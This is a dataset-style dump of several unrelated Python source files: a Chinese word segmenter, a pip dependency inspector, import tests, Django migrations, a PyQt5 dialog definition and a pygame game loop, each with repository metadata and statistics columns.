] | 1 | 2020-07-01T08:28:39.000Z | 2020-07-01T08:28:39.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import codecs
from ..utils.tnt import TnT
class Seg(object):
    """Word segmenter backed by a TnT tagger.

    Characters are tagged individually; in seg(), tag 's' marks a
    single-character word and 'e' the end of a multi-character word
    (other tags presumably mark begin/middle — TODO confirm against the
    training data).

    NOTE(review): Python 2 code (train() relies on map() returning a
    list; the module's __main__ block uses the print statement).
    """
    def __init__(self):
        # The underlying statistical tagger; trained or loaded below.
        self.segger = TnT()

    def save(self, fname):
        """Persist the trained tagger model to *fname*."""
        self.segger.save(fname)

    def load(self, fname):
        """Load a previously trained tagger model from *fname*."""
        self.segger.load(fname)

    def train(self, file_name):
        """Train the tagger from a UTF-8 corpus.

        Each non-empty line holds whitespace-separated ``token/tag``
        pairs, split here into [token, tag] lists for TnT.train().
        """
        fr = codecs.open(file_name, 'r', 'utf-8')
        data = []
        for i in fr:
            line = i.strip()
            if not line:
                continue
            # NOTE(review): on Python 3 map() is lazy, so tmp would be an
            # iterator rather than a list — this targets Python 2.
            tmp = map(lambda x: x.split('/'), line.split())
            data.append(tmp)
        fr.close()
        self.segger.train(data)

    def seg(self, sentence):
        """Yield the segmented words of *sentence*.

        Walks the (char, tag) pairs from the tagger: 's' emits a
        single-character word, 'e' flushes the accumulated characters as
        one word, anything else keeps accumulating.
        """
        ret = self.segger.tag(sentence)
        tmp = ''
        for i in ret:
            if i[1] == 's':
                yield i[0]
            elif i[1] == 'e':
                yield tmp+i[0]
                tmp = ''
            else:
                tmp += i[0]
if __name__ == '__main__':
    # Demo (Python 2 syntax): train from data.txt, then segment a sample
    # Chinese sentence and print the tokens joined by spaces.
    seg = Seg()
    seg.train('data.txt')
    print ' '.join(seg.seg('主要是用来放置一些简单快速的中文分词和词性标注的程序'))
| 21.38 | 59 | 0.4855 | 130 | 1,069 | 3.846154 | 0.446154 | 0.1 | 0.052 | 0.076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010463 | 0.374181 | 1,069 | 49 | 60 | 21.816327 | 0.736921 | 0.019645 | 0 | 0.055556 | 0 | 0 | 0.049713 | 0.024857 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42e7de5abf0cb7b8ecb2c1b6a7920c0669cee2e7 | 7,130 | py | Python | src/main/resources/pip-inspector.py | antontroshin/synopsys-detect | 3ae9aaee5f98a7ebf8bda615603ba5ba25f13424 | [
"Apache-2.0"
] | 91 | 2019-02-28T19:10:32.000Z | 2022-03-17T18:56:53.000Z | src/main/resources/pip-inspector.py | antontroshin/synopsys-detect | 3ae9aaee5f98a7ebf8bda615603ba5ba25f13424 | [
"Apache-2.0"
] | 360 | 2019-02-25T20:08:58.000Z | 2022-02-02T17:50:12.000Z | src/main/resources/pip-inspector.py | antontroshin/synopsys-detect | 3ae9aaee5f98a7ebf8bda615603ba5ba25f13424 | [
"Apache-2.0"
] | 53 | 2019-02-15T19:38:56.000Z | 2022-03-31T06:37:49.000Z | # pylint: disable=fixme, line-too-long, import-error, no-name-in-module
#
# Copyright (c) 2020 Synopsys, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Uncomment for debugging. Can't use localhost.
# See: https://www.jetbrains.com/help/pycharm/remote-debugging-with-product.html#remote-debug-config
# import pydevd_pycharm
# pydevd_pycharm.settrace('<Host IP Address>', port=5002, stdoutToServer=True, stderrToServer=True)
"""
A script that inspects the pip cache to determine the hierarchy of dependencies
Usage: pip-inspector.py --projectname=<project_name> --requirements=<requirements_path>
"""
from getopt import getopt, GetoptError
from os import path
import sys
from re import split
from pkg_resources import working_set, Requirement
import pip
pip_major_version = int(pip.__version__.split(".")[0])
if pip_major_version >= 20:
from pip._internal.req import parse_requirements
from pip._internal.network.session import PipSession
elif pip_major_version >= 10:
from pip._internal.req import parse_requirements
from pip._internal.download import PipSession
else:
from pip.req import parse_requirements
from pip.download import PipSession
def main():
    """Handle commandline args, execute the inspector, and print the dependency tree.

    Options:
        -p / --projectname   name of the installed project used as the tree root
        -r / --requirements  path to a requirements file to resolve

    Exits with status 2 on unknown options; prints 'r?<path>' when the
    requirements file does not exist (same marker style as the 'n?'/'p?'
    markers used elsewhere in this script).
    """
    try:
        opts, __ = getopt(sys.argv[1:], 'p:r:', ['projectname=', 'requirements='])
    except GetoptError as error:
        print(str(error))
        print('integration-pip-inspector.py --projectname=<project_name> --requirements=<requirements_path>')
        sys.exit(2)
    project_name = None
    requirements_path = None
    for opt, arg in opts:
        if opt in ('-p', '--projectname'):
            project_name = arg
        elif opt in ('-r', '--requirements'):
            requirements_path = arg

    project_dependency_node = resolve_project_node(project_name)
    if requirements_path is not None:
        # Explicit check instead of the original `assert`: assertions are
        # stripped under `python -O`, which would have turned the
        # missing-file marker into an unhandled crash.
        if path.exists(requirements_path):
            populate_dependency_tree(project_dependency_node, requirements_path)
        else:
            print('r?' + requirements_path)
    print(project_dependency_node.render())
def resolve_project_node(project_name):
    """Resolve the root DependencyNode from the --projectname argument.

    Falls back to a placeholder node with name 'n?' and version 'v?'
    when no project name was given or the package cannot be resolved.
    """
    node = recursively_resolve_dependencies(project_name, []) if project_name is not None else None
    return node if node is not None else DependencyNode('n?', 'v?')
def populate_dependency_tree(project_root_node, requirements_path):
    """Resolve the requirements file's entries and append them to the tree.

    Unresolvable packages are reported as '--<name>'; if the file itself
    cannot be parsed, 'p?<path>' is printed instead.
    """
    try:
        # This line is pretty much the only reason why we call the internal pip APIs anymore. We should consider if we
        # can do this with a more generalized approach.
        # --rotte DEC 2020
        parsed_requirements = parse_requirements(requirements_path, session=PipSession())
        for parsed_requirement in parsed_requirements:
            package_name = None
            # In 20.1 of pip, the requirements object changed
            if hasattr(parsed_requirement, 'req'):
                package_name = parsed_requirement.req.name
            if package_name is None:
                # Comparators from: https://www.python.org/dev/peps/pep-0508/#grammar
                # (Last updated November 2020)
                #
                # re matches from left to right, so subsets (e.g. ===) should be before supersets (e.g. ==)
                # See: https://docs.python.org/3/library/re.html
                # --rotte NOV 2020
                package_name = split('===|<=|!=|==|>=|~=|<|>', parsed_requirement.requirement)[0]
            dependency_node = recursively_resolve_dependencies(package_name, [])
            if dependency_node is not None:
                project_root_node.children = project_root_node.children + [dependency_node]
            else:
                print('--' + package_name)
    # Narrowed from a bare `except:`, which also swallowed
    # SystemExit/KeyboardInterrupt and made the script uninterruptible here.
    except Exception:
        print('p?' + requirements_path)
def recursively_resolve_dependencies(package_name, history):
    """Build a DependencyNode tree for *package_name* by recursing into its
    requirements.

    *history* carries the lower-cased names already visited on this path so
    cyclic dependencies terminate instead of recursing forever.  Returns None
    when the package cannot be found.
    """
    package = get_package_by_name(package_name)
    if package is None:
        return None
    node = DependencyNode(package.project_name, package.version)
    lowered = package_name.lower()
    if lowered not in history:
        child_history = history + [lowered]
        for requirement in package.requires():
            child = recursively_resolve_dependencies(requirement.key, child_history)
            if child is not None:
                node.children = node.children + [child]
    return node
def get_package_by_name(package_name):
    """Look up an installed package in the pip cache (pkg_resources working_set).

    Tries the canonical Requirement key first, then a few common name variants
    (case / dash / underscore swaps).  Returns None when not found.
    """
    if package_name is None:
        return None
    package_dict = working_set.by_key
    # TODO: By using pkg_resources.Requirement.parse to get the correct key, we
    # may not need to attempt the other methods. Robust tests are needed to confirm.
    try:
        return package_dict[Requirement.parse(package_name).key]
    except Exception:
        # Was a bare `except:`; narrowed so KeyboardInterrupt/SystemExit propagate.
        # Parse errors and missing keys both fall through to the variant search.
        pass
    name_variants = (package_name, package_name.lower(),
                     package_name.replace('-', '_'), package_name.replace('_', '-'))
    for name_variant in name_variants:
        if name_variant in package_dict:
            return package_dict[name_variant]
    return None
class DependencyNode(object):
    """A python dependency in a tree graph: a name, a version, and a list of
    child DependencyNodes."""

    def __init__(self, name, version):
        self.name = name
        self.version = version
        self.children = []

    def render(self, layer=1):
        """Recursively build the printable dependency-tree string, indenting
        each nesting level by four spaces."""
        pieces = [self.name + "==" + self.version]
        indent = " " * 4 * layer
        for child in self.children:
            pieces.append("\n" + indent + child.render(layer + 1))
        return "".join(pieces)
# Run the CLI only when executed directly, not on import.
if __name__ == '__main__':
    main()
| 38.333333 | 120 | 0.692146 | 901 | 7,130 | 5.310766 | 0.322974 | 0.03908 | 0.03511 | 0.016301 | 0.126228 | 0.068339 | 0.050157 | 0.050157 | 0.050157 | 0.023406 | 0 | 0.007721 | 0.218934 | 7,130 | 185 | 121 | 38.540541 | 0.851499 | 0.364095 | 0 | 0.153061 | 0 | 0 | 0.055069 | 0.025174 | 0 | 0 | 0 | 0.010811 | 0.020408 | 1 | 0.071429 | false | 0.010204 | 0.122449 | 0 | 0.285714 | 0.061224 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42e9d5a929b67332ce2eb90fefc0bfcc96dc7a14 | 3,427 | py | Python | tests/test_imports.py | JunCEEE/hummingbird | 0b1bdf5023b92090f31d9bc857e0854a805cf2cd | [
"BSD-2-Clause"
] | 14 | 2016-02-18T23:10:12.000Z | 2021-07-30T09:19:56.000Z | tests/test_imports.py | JunCEEE/hummingbird | 0b1bdf5023b92090f31d9bc857e0854a805cf2cd | [
"BSD-2-Clause"
] | 66 | 2015-11-18T15:39:45.000Z | 2015-12-06T16:06:20.000Z | tests/test_imports.py | JunCEEE/hummingbird | 0b1bdf5023b92090f31d9bc857e0854a805cf2cd | [
"BSD-2-Clause"
] | 13 | 2016-07-07T13:15:52.000Z | 2021-11-10T11:56:13.000Z | import os, sys
import warnings
__thisdir__ = os.path.dirname(os.path.realpath(__file__))
def test_import_numpy():
    """The numpy package must be importable."""
    try:
        import numpy as np  # noqa: F401
    except ImportError as e:
        raise AssertionError("Numpy could not be imported:\n %s" % e)
    # Bug fix: removed the stray sys.path.pop(0) -- nothing was inserted onto
    # sys.path in this test, so the pop corrupted sys.path for later tests.
def test_import_scipy():
    """The scipy package must be importable."""
    try:
        import scipy as sp  # noqa: F401
    except ImportError as e:
        raise AssertionError("Scipy could not be imported:\n %s" % e)
    # Bug fix: removed the stray sys.path.pop(0) -- nothing was inserted onto
    # sys.path in this test, so the pop corrupted sys.path for later tests.
def test_import_mpi4py():
    """mpi4py is optional: a missing or broken install only emits a warning."""
    try:
        from mpi4py import MPI  # noqa: F401
    except ImportError:
        # Optional dependency: warn instead of failing the suite.
        warnings.warn(UserWarning("MPI for python could not be imported"))
    # Bug fix: removed the stray sys.path.pop(0) (nothing was inserted here)
    # and the no-op `assert(1 == 1)`.
def test_import_qt_modules():
    """The Qt wrapper (interface.Qt) must expose QtGui and QtCore."""
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        try:
            from interface.Qt import QtGui, QtCore  # noqa: F401
        except ImportError as e:
            raise AssertionError("The Qt modules QtGui and QtCore could not be imported:\n %s" % e)
    finally:
        # Bug fix: pop in a finally block so a failed import no longer leaks
        # the inserted path onto sys.path for later tests.
        sys.path.pop(0)
# Testing the import of the pyqtgraph module
def test_import_pyqtgraph_module():
try:
import pyqtgraph
except ImportError:
assert (1 == 0), "The pyqtgraph module could not be imported"
sys.path.pop(0)
def test_import_interface_module():
    """The project's interface module must be importable from src/."""
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        try:
            import interface  # noqa: F401
        except ImportError as e:
            raise AssertionError("The interface module could not be imported:\n %s" % e)
    finally:
        # Bug fix: pop in a finally block so a failed import no longer leaks
        # the inserted path onto sys.path for later tests.
        sys.path.pop(0)
def test_import_ipc_module():
    """The project's ipc module must be importable from src/."""
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        try:
            import ipc  # noqa: F401
        except ImportError as e:
            raise AssertionError("The ipc module could not be imported:\n %s" % e)
    finally:
        # Bug fix: pop in a finally block so a failed import no longer leaks
        # the inserted path onto sys.path for later tests.
        sys.path.pop(0)
def test_import_plotting_module():
    """The project's plotting module must be importable from src/."""
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        try:
            import plotting  # noqa: F401
        except ImportError as e:
            raise AssertionError("The plotting module could not be imported:\n %s" % e)
    finally:
        # Bug fix: pop in a finally block so a failed import no longer leaks
        # the inserted path onto sys.path for later tests.
        sys.path.pop(0)
def test_import_analysis_module():
    """The project's analysis module must be importable from src/."""
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        try:
            import analysis  # noqa: F401
        except ImportError as e:
            raise AssertionError("The analysis module could not be imported:\n %s" % e)
    finally:
        # Bug fix: pop in a finally block so a failed import no longer leaks
        # the inserted path onto sys.path for later tests.
        sys.path.pop(0)
def test_import_simulation_module():
    """The project's simulation module must be importable from src/."""
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        try:
            import simulation  # noqa: F401
        except ImportError as e:
            raise AssertionError("The simulation module could not be imported:\n %s" % e)
    finally:
        # Bug fix: pop in a finally block so a failed import no longer leaks
        # the inserted path onto sys.path for later tests.
        sys.path.pop(0)
def test_import_utils_module():
    """The project's utils module must be importable from src/."""
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        try:
            import utils  # noqa: F401
        except ImportError as e:
            raise AssertionError("The utils module could not be imported:\n %s" % e)
    finally:
        # Bug fix: pop in a finally block so a failed import no longer leaks
        # the inserted path onto sys.path for later tests.
        sys.path.pop(0)
def test_import_backend_lcls():
    """The LCLS backend is optional: a missing install only emits a warning.

    Returns True when the backend imported, False otherwise.
    """
    sys.path.insert(0, __thisdir__ + "/../src")
    try:
        import backend.lcls  # noqa: F401
        return True
    except ImportError as e:
        # Optional dependency: warn instead of failing the suite.
        warnings.warn(UserWarning("The LCLS backend could not be imported:\n %s" % e))
        return False
    finally:
        # Bug fix: the original sys.path.pop(0) sat after the return statements
        # and was unreachable, leaking the inserted path onto sys.path.
        sys.path.pop(0)
| 30.061404 | 89 | 0.646046 | 501 | 3,427 | 4.273453 | 0.133733 | 0.06539 | 0.072863 | 0.100887 | 0.558617 | 0.537599 | 0.516114 | 0.467539 | 0.350771 | 0.22653 | 0 | 0.017864 | 0.248614 | 3,427 | 113 | 90 | 30.327434 | 0.813592 | 0.147067 | 0 | 0.528736 | 0 | 0 | 0.199381 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 1 | 0.137931 | false | 0 | 0.574713 | 0 | 0.735632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
42ec24b596da19ef3e315c639b3ed58207a9f443 | 572 | py | Python | hostmanager/migrations/0002_auto_20170929_2313.py | kingsdigitallab/devops-django | faaa58a413d3e763c82ccd7a27a1bd27586fe9dd | [
"MIT"
] | 1 | 2020-08-20T07:00:14.000Z | 2020-08-20T07:00:14.000Z | hostmanager/migrations/0002_auto_20170929_2313.py | kingsdigitallab/devops-django | faaa58a413d3e763c82ccd7a27a1bd27586fe9dd | [
"MIT"
] | 1 | 2017-09-29T22:26:35.000Z | 2019-09-18T03:28:20.000Z | hostmanager/migrations/0002_auto_20170929_2313.py | kingsdigitallab/devops-django | faaa58a413d3e763c82ccd7a27a1bd27586fe9dd | [
"MIT"
] | 2 | 2018-01-04T16:45:53.000Z | 2019-10-02T15:35:32.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-29 22:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: relax Server.ip to an optional CharField
    with help text and an 'IP Address' verbose name."""

    # Must run after the app's initial schema migration.
    dependencies = [
        ('hostmanager', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='server',
            name='ip',
            field=models.CharField(blank=True, help_text='Will be automatically populated if the domain is registered.', max_length=255, null=True, verbose_name='IP Address'),
        ),
    ]
| 27.238095 | 182 | 0.63986 | 67 | 572 | 5.313433 | 0.835821 | 0.033708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.244755 | 572 | 20 | 183 | 28.6 | 0.768519 | 0.118881 | 0 | 0 | 1 | 0 | 0.215569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42ef2e1738628cd3478c798c40aeb644a4edd094 | 1,506 | py | Python | wagtail/search/migrations/0005_create_indexentry.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | 1 | 2022-02-09T05:25:30.000Z | 2022-02-09T05:25:30.000Z | wagtail/search/migrations/0005_create_indexentry.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | wagtail/search/migrations/0005_create_indexentry.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-28 14:12
import django.db.models.deletion # noqa
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: create the IndexEntry model with a
    (content_type, object_id) uniqueness constraint."""

    dependencies = [
        ("contenttypes", "0002_remove_content_type_name"),
        ("wagtailsearch", "0004_querydailyhits_verbose_name_plural"),
    ]

    operations = [
        migrations.CreateModel(
            name="IndexEntry",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                # Generic-relation target: pk of the indexed object as text.
                ("object_id", models.CharField(max_length=50)),
                ("title_norm", models.FloatField(default=1.0)),
                (
                    "content_type",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="+",
                        to="contenttypes.contenttype",
                    ),
                ),
            ],
            options={
                "verbose_name": "index entry",
                "verbose_name_plural": "index entries",
                "abstract": False,
            },
        ),
        # One index entry per (content type, object id) pair.
        migrations.AlterUniqueTogether(
            name="indexentry",
            unique_together={("content_type", "object_id")},
        ),
    ]
| 30.12 | 69 | 0.458831 | 113 | 1,506 | 5.911504 | 0.628319 | 0.065868 | 0.041916 | 0.065868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031877 | 0.437583 | 1,506 | 49 | 70 | 30.734694 | 0.756789 | 0.033201 | 0 | 0.142857 | 1 | 0 | 0.176875 | 0.063317 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42f46e7b9f4ed5fd9e45b9b941cd383196bd9585 | 2,945 | py | Python | ui/ui_designer/ui_file/uic_initDialog.py | Tanyiqu/AnimeArtifactPro | 771eded4c117c7dbd5e5066036dd4ef76783c90a | [
"Apache-2.0"
] | 50 | 2020-04-16T15:21:32.000Z | 2020-10-05T11:56:57.000Z | ui/ui_designer/ui_file/uic_initDialog.py | tanyiqu/AnimeArtifactPro | 771eded4c117c7dbd5e5066036dd4ef76783c90a | [
"Apache-2.0"
] | 2 | 2020-10-23T19:47:59.000Z | 2021-01-25T02:55:00.000Z | ui/ui_designer/ui_file/uic_initDialog.py | Tanyiqu/AnimeArtifactPro | 771eded4c117c7dbd5e5066036dd4ef76783c90a | [
"Apache-2.0"
] | 4 | 2020-04-22T14:25:35.000Z | 2020-06-20T15:26:53.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'initDialog.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_initDialog(object):
    """Auto-generated (pyuic5) UI definition for the init dialog.

    NOTE: generated from initDialog.ui -- manual edits are lost on
    regeneration; change the .ui file instead.
    """

    def setupUi(self, initDialog):
        """Create and lay out the dialog's widgets on *initDialog*."""
        initDialog.setObjectName("initDialog")
        # Fixed-size 450x180 dialog (min == max disables resizing).
        initDialog.resize(450, 180)
        initDialog.setMinimumSize(QtCore.QSize(450, 180))
        initDialog.setMaximumSize(QtCore.QSize(450, 180))
        self.txtUserName = QtWidgets.QLineEdit(initDialog)
        self.txtUserName.setGeometry(QtCore.QRect(130, 20, 291, 31))
        self.txtUserName.setObjectName("txtUserName")
        self.lblUserName = QtWidgets.QLabel(initDialog)
        self.lblUserName.setGeometry(QtCore.QRect(20, 26, 90, 16))
        self.lblUserName.setObjectName("lblUserName")
        self.lblPlayerPath = QtWidgets.QLabel(initDialog)
        self.lblPlayerPath.setGeometry(QtCore.QRect(20, 69, 156, 16))
        self.lblPlayerPath.setObjectName("lblPlayerPath")
        self.lblIDMPath = QtWidgets.QLabel(initDialog)
        self.lblIDMPath.setGeometry(QtCore.QRect(20, 110, 156, 16))
        self.lblIDMPath.setObjectName("lblIDMPath")
        self.btnChoosePlayer = QtWidgets.QToolButton(initDialog)
        self.btnChoosePlayer.setGeometry(QtCore.QRect(190, 69, 37, 18))
        self.btnChoosePlayer.setObjectName("btnChoosePlayer")
        self.btnChooseIDM = QtWidgets.QToolButton(initDialog)
        self.btnChooseIDM.setGeometry(QtCore.QRect(190, 110, 37, 18))
        self.btnChooseIDM.setObjectName("btnChooseIDM")
        self.lblPlayer = QtWidgets.QLabel(initDialog)
        self.lblPlayer.setGeometry(QtCore.QRect(240, 69, 181, 16))
        self.lblPlayer.setObjectName("lblPlayer")
        self.lblIDM = QtWidgets.QLabel(initDialog)
        self.lblIDM.setGeometry(QtCore.QRect(240, 110, 181, 16))
        self.lblIDM.setObjectName("lblIDM")
        self.btnFinished = QtWidgets.QPushButton(initDialog)
        self.btnFinished.setGeometry(QtCore.QRect(340, 140, 75, 31))
        self.btnFinished.setObjectName("btnFinished")

        self.retranslateUi(initDialog)
        QtCore.QMetaObject.connectSlotsByName(initDialog)

    def retranslateUi(self, initDialog):
        """Install the user-facing display strings (intentionally Chinese)."""
        _translate = QtCore.QCoreApplication.translate
        initDialog.setWindowTitle(_translate("initDialog", "做一些初始化"))
        self.lblUserName.setText(_translate("initDialog", "用户名(8个字符)"))
        self.lblPlayerPath.setText(_translate("initDialog", "播放器路径(可以暂时不选择)"))
        self.lblIDMPath.setText(_translate("initDialog", "下载器路径(可以暂时不选择)"))
        self.btnChoosePlayer.setText(_translate("initDialog", "..."))
        self.btnChooseIDM.setText(_translate("initDialog", "..."))
        self.lblPlayer.setText(_translate("initDialog", "无"))
        self.lblIDM.setText(_translate("initDialog", "无"))
        self.btnFinished.setText(_translate("initDialog", "完成"))
| 48.278689 | 78 | 0.702207 | 295 | 2,945 | 6.972881 | 0.311864 | 0.074866 | 0.096257 | 0.070491 | 0.030141 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046407 | 0.173175 | 2,945 | 60 | 79 | 49.083333 | 0.798357 | 0.062479 | 0 | 0 | 1 | 0 | 0.09114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.085106 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e0198a52c860e5e44813f8e29c44e0fcf1479c4 | 1,199 | py | Python | outbreak_z.py | jonesmat/outbreak_z | aec920e38a18866e83f54975e89c2de67d83f4f8 | [
"MIT"
] | 1 | 2020-08-19T13:23:26.000Z | 2020-08-19T13:23:26.000Z | outbreak_z.py | jonesmat/outbreak_z | aec920e38a18866e83f54975e89c2de67d83f4f8 | [
"MIT"
] | null | null | null | outbreak_z.py | jonesmat/outbreak_z | aec920e38a18866e83f54975e89c2de67d83f4f8 | [
"MIT"
] | null | null | null | import pygame
from pygame.locals import QUIT, KEYDOWN, K_q, K_ESCAPE, K_BACKQUOTE, MOUSEBUTTONDOWN
from resources.resourcemgr import ResourceMgr
from scenes.game_scene import GameScene
def main():
    """Run the game: initialise pygame, then loop input/update/draw at 30 FPS."""
    pygame.init()

    screen = pygame.display.set_mode((1280, 800), 0, 32)
    frame_clock = pygame.time.Clock()

    scene = GameScene(ResourceMgr())
    scene.generate_game()

    while True:
        # Input phase: drain the event queue; returning ends the game.
        for event in pygame.event.get():
            if event.type == QUIT:
                return
            elif event.type == KEYDOWN:
                if event.key in (K_q, K_ESCAPE):
                    return
                if event.key == K_BACKQUOTE:
                    scene.handle_tilde_key_down()
            elif event.type == MOUSEBUTTONDOWN:
                if event.button == 1:
                    scene.handle_mouse_left_down(pygame.mouse.get_pos())
                elif event.button == 3:
                    scene.handle_mouse_right_down(pygame.mouse.get_pos())

        # Update/draw phase, capped at 30 frames per second.
        elapsed_ms = frame_clock.tick(30)
        scene.tick(elapsed_ms)
        scene.draw(screen)

        pygame.display.update()
main() | 29.243902 | 84 | 0.608007 | 144 | 1,199 | 4.847222 | 0.416667 | 0.110315 | 0.047278 | 0.031519 | 0.060172 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016726 | 0.301918 | 1,199 | 41 | 85 | 29.243902 | 0.817204 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0.066667 | 0.133333 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6e066ab1df692bc8b908f58486fc5b072fb3df64 | 1,500 | py | Python | events/migrations/0014_tournament.py | RyanRMurray/warwick_gg | 3d9904c3afc706620ac2a98736dafa7e655765d2 | [
"MIT"
] | 5 | 2018-03-08T13:02:07.000Z | 2020-04-09T13:36:20.000Z | events/migrations/0014_tournament.py | RyanRMurray/warwick_gg | 3d9904c3afc706620ac2a98736dafa7e655765d2 | [
"MIT"
] | 15 | 2018-05-29T13:22:40.000Z | 2022-03-11T23:20:32.000Z | events/migrations/0014_tournament.py | RyanRMurray/warwick_gg | 3d9904c3afc706620ac2a98736dafa7e655765d2 | [
"MIT"
] | 7 | 2018-05-26T15:15:43.000Z | 2020-01-04T20:24:33.000Z | # Generated by Django 2.0.2 on 2018-06-07 13:25
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Auto-generated migration: create the Tournament model, optionally
    linked to an events.Event."""

    dependencies = [
        ('events', '0013_eventsignup_unsigned_up_at'),
    ]

    operations = [
        migrations.CreateModel(
            name='Tournament',
            fields=[
                # Explicit (non-auto) integer primary key.
                ('id', models.IntegerField(primary_key=True, serialize=False)),
                ('title', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, help_text='<a href="http://daringfireball.net/projects/markdown/syntax" target="_blank">Markdown syntax</a> allowed, but no raw HTML. Examples: **bold**, *italic*, indent 4 spaces for a code block.')),
                # Event window and signup window all default to "now".
                ('start', models.DateTimeField(default=django.utils.timezone.now)),
                ('end', models.DateTimeField(default=django.utils.timezone.now)),
                ('signup_form', models.URLField()),
                ('signup_start', models.DateTimeField(default=django.utils.timezone.now)),
                ('signup_end', models.DateTimeField(default=django.utils.timezone.now)),
                ('requires_attendance', models.BooleanField(default=False)),
                ('slug', models.SlugField(max_length=40, unique=True)),
                # Optional link to the hosting event; removed with it (CASCADE).
                ('for_event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='events.Event')),
            ],
        ),
    ]
